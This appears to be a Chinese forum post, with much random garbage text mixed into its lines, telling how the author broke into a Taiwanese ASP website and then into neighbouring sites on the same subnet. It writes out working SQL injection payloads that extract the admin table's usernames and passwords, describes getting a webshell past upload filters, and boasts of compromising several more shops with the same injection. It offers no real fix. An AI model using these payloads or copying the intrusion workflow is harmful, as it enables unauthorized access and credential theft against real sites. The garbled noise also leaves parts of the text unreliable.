发现一个注入点 L2 l# S" r& T& b" x+ y+ K t* Q4 ^
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389' s! Y0 k& H5 C! A6 U8 W
' g5 {% \! B: u$ U+ ?# v2 Y- s
习惯性的加’having1=1--
/ ?* G& `- w% I+ @$ P, ]7 m9 C3 }: P4 M9 Z- B$ K! M
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
( x* p6 R2 r2 L0 t* V. n2 [% t n, t+ x& D1 @2 R
0+ a8 \! X5 Z0 ~8 Z3 W e) j, |" q
% {/ s5 W2 @- `! t% F8 B" i! J爆出Diary_A.dl_Title(这时候很激动啊)1 A. I8 s# i, B& Y9 w, q) b' u
0 |7 k5 M$ c0 m1 a5 n- q* g那么继续
2 _! F$ b/ M% u1 Hhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
: S$ N7 `" |; c
5 w7 n9 j( U' o- C4 U% k! a0 i- J$ _% ~继续,一直爆下去. B y: w2 ]3 C
# J' [" U2 Y3 q, L) m4 p
爆到几个字段和表段 但是没找到需要的管理用户的字段6 ~( ?$ @6 w1 l5 W
3 E1 w5 `; H/ f+ n K/ |2 ~
蛋疼了 怎么办 然后去后台登陆页看源码( z8 s* j" z N9 a+ k# @
# n& v. q: d, x, P( \0& w& f. H+ N2 Q
( ]' i1 Z5 q% s: F9 C2 e/ {" y
Input name= “ADUID”
2 S- e. }6 Y9 A0 q0 j5 YInput name= “ADPWD”) j$ S% c% m R5 U6 t) N- Y
4 u8 l) N$ ?" T* f5 g& {4 V3 y
很幸运 找到了字段那就继续, V9 I' n- r6 i" G
找到之后开始爆用户
/ W0 c* a* u0 T! n( ghttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
Z( I8 B1 w1 f# e% r8 Z爆密码
' a& }) e' o2 lhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
& z6 W. @! v$ u/ \9 }1 {$ @6 `2 c, a测试了下 这个注入点只能爆到文章哪里的表
& U& _6 {; P: t+ c1 H K8 U
/ Q) ^0 t* q- a6 r/ ]8 [头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了) y2 a+ Y8 s7 ^0 @& r) | k, y. t
+ F. _ v: G* z0 C又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
8 `! F* O; s# I' V1 V, d; `# x- L7 y: u* T# V8 u
473
8 T! }2 e, ?: ?" o' o! ]5 b p9 e# O% |' U( N9 P- n' r( Z. h
进后台- T! B$ u3 t: s
7 u& _; [' u, k+ b% Z- r4 \1 v* C; A$ @* m3 Q- v+ x
发现几个上传点 有的地方不能上传 而且防止恶意代码
$ i p8 |% M$ a( M3 l$ p& U
8 a5 t0 t# y z7 ^' I没办法 各种百度各种找大牛 找到一只好像可以突破的马
4 a) C# S* z* _' j n# v9 R$ F: Y1 ^
9 a O7 _3 a7 q6 U$ s [0 T k3 x0 p0 V; z( G, y: W
在系统管理那里直接上传 不过没有显示地址
/ Z- h4 `0 j& V x% M% f3 x0 L9 l
, @0 W5 P- T$ k/ R5 ~再上传一次 抓包 搞定OK
% G! t: i U y* o4 Z% Z, ^% X/ h$ l @6 {4 Y1 {7 e3 p: A4 T+ ?: E
9 _& G. _) f# w. ?5 _
3 _5 z6 ]5 [. h6 D! w6 ]/ U472
& C9 K1 t5 u; _: _& d& o# a, _+ h' z1 |" ^" W+ ^9 ~% e( k
晚上不行了 去睡觉。。。
, T h. W A% g/ X* p1 @第二天刚起床 闲的没事做继续日站吧
$ P: x/ C( P4 A d' _0 S' W' i5 t4 y9 n* A. Q
找个站 就把这个站的旁c扫了下
+ C4 X8 r2 o% A( r* q/ K3 |" l5 P' M7 {' R( F0 j4 v
发现c段也有一个购物站 ,然后还和这个站的模板差不多
, x. W2 \6 C- K* y- K! D
4 Q2 w3 ^& C5 j) b( @ B& T+ C2 \就找到会员登录口测试
# d4 f8 t, |' g
- V M' h9 m" J3 P$ \6 ^8 O'and (select top 1 MGR_UID from A_MGR)>0—( b5 ^: I, k) A4 U) P( @
果断爆到了 这时候我很激动 通杀
2 \; c2 `( e& Z6 N, z
- m2 G* P/ j- ~; p: L再次翻c段2 a" e: X% j X8 X$ y3 m! ]
h# h. i, |- I翻出几个站 都成功拿下
8 ~9 k$ V5 g& {: H% j7 F! w) ]" \0 `( s/ M2 h
$ |1 j3 w" O1 w' a0 i) G
9 g% x/ d5 B. x修复方案:/ c/ H3 y' y+ _# ?$ x) h. ~& }
他们比我专业 % K4 M: l0 G8 f, w, P7 Y
4 j! w+ M* g* G3 g ]/ X5 z/ M# a* x! g, }! }# p+ Z: ~
; k( n+ b6 @& n* |+ L
|